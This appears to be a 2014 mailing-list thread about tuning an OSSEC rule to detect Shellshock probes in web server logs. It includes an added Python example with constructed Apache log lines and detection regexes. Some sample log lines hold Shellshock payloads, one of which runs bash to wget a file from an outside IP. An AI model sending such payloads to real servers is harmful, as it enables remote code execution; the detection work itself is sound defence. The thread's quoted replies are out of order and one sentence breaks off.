Hello Michael,
> Thanks for sharing this. Any specific reason for the '\.+' after the '()'?
You are right, '\.*' is better. Thanks for pointing this out.
> Also, the ':' before ';' is not part of the exploit, so you may want to
> remove that.
You are right again, there can be anything before ';'.
On 10/04/2014 05:30 AM, Jan Andrasko wrote:
> Rob,
>
> The issue with your rule was that this string is not part of the URL. It is
> usually in place of the user agent, which is not decoded by OSSEC. Therefore
> you need to regex the whole log message.
>
> Brgds
> Jan
A note about this: I have seen this exploit
Thanks very much, I've added the rule. Appreciate the assistance!
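To make Jan's point concrete (the "() {" string sits in the User-Agent field, which the web decoder does not expose as the url field, so a rule keyed on the url misses it and the whole log message has to be matched) together with Michael's two corrections ("\.*" rather than "\.+" after "()", and anything rather than ":" before ";"), here is an added Python example. It is not from this thread and not OSSEC code: the log lines are constructed, the two patterns are Python translations of the rule shapes discussed (OSSEC's "\." matches any character, so "\.*" becomes ".*"), and the actual rule text is not reproduced because it does not appear on this page.

```python
import re
from typing import Optional

# Constructed Apache "combined" log lines for demonstration (not from the thread).
SAMPLE_LOGS = [
    # Shellshock probe in the User-Agent field, the usual placement
    '203.0.113.5 - - [04/Oct/2014:05:30:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 12 "-" "() { :;}; /bin/bash -c \\"wget http://198.51.100.7/x\\""',
    # Same probe with no space between "()" and "{", which a "\.+" pattern would miss
    '203.0.113.6 - - [04/Oct/2014:05:31:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 12 "-" "(){ :;}; /bin/true"',
    # Probe carried in the request line, the only place a url-field rule would see it
    '203.0.113.7 - - [04/Oct/2014:05:32:00 +0000] "GET /cgi-bin/test.cgi?x=() { foo;}; HTTP/1.1" '
    '404 0 "-" "Mozilla/5.0"',
    # Benign request; note the parentheses and ";" that must not trigger
    '203.0.113.8 - - [04/Oct/2014:05:33:00 +0000] "GET /index.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# Apache combined format: request line and user agent are quoted fields.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Python translations of the two rule shapes discussed in the thread (assumed,
# the original rule is not on the page). OLD_PATTERN requires at least one
# character between "()" and "{"; FIXED_PATTERN allows zero, and allows
# anything (not only ":") before the ";".
OLD_PATTERN = re.compile(r'\(\).+\{.*;')
FIXED_PATTERN = re.compile(r'\(\).*\{.*;')


def parse_combined(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields, or None if malformed."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def url_field_hit(line: str, pattern: re.Pattern = FIXED_PATTERN) -> bool:
    """What a rule keyed on the decoded url field sees: only the request line."""
    rec = parse_combined(line)
    return bool(rec and pattern.search(rec["request"]))


def full_log_hit(line: str, pattern: re.Pattern = FIXED_PATTERN) -> bool:
    """What a regex over the whole log message sees: every field, user agent included."""
    return bool(pattern.search(line))


def locate_shellshock(line: str, pattern: re.Pattern = FIXED_PATTERN) -> Optional[str]:
    """Name the field that carries the probe ("request", "ua" or "referer"), or None."""
    rec = parse_combined(line)
    if rec is None:
        return None
    for field in ("request", "ua", "referer"):
        if pattern.search(rec[field]):
            return field
    return None


def scan(lines, pattern: re.Pattern = FIXED_PATTERN):
    """Return (index, field) for every line the whole-message regex catches."""
    return [(i, locate_shellshock(l, pattern))
            for i, l in enumerate(lines) if full_log_hit(l, pattern)]


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LOGS):
        print(i, "url-field:", url_field_hit(line),
              "full-log:", full_log_hit(line),
              "field:", locate_shellshock(line))
```

Running it shows the first two lines are invisible to the url-field check and only caught by the whole-message regex, and that the second line is caught only once "\.+" becomes "\.*".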
On Sat, Oct 4, 2014 at 9:30 AM, Michael Starks wrote:
> On 10/04/2014 05:30 AM, Jan Andrasko wrote:
> > Rob,
> >
> > The issue with your rule was that this string is not part of the URL. It is
> > usually in place of the user agent, which is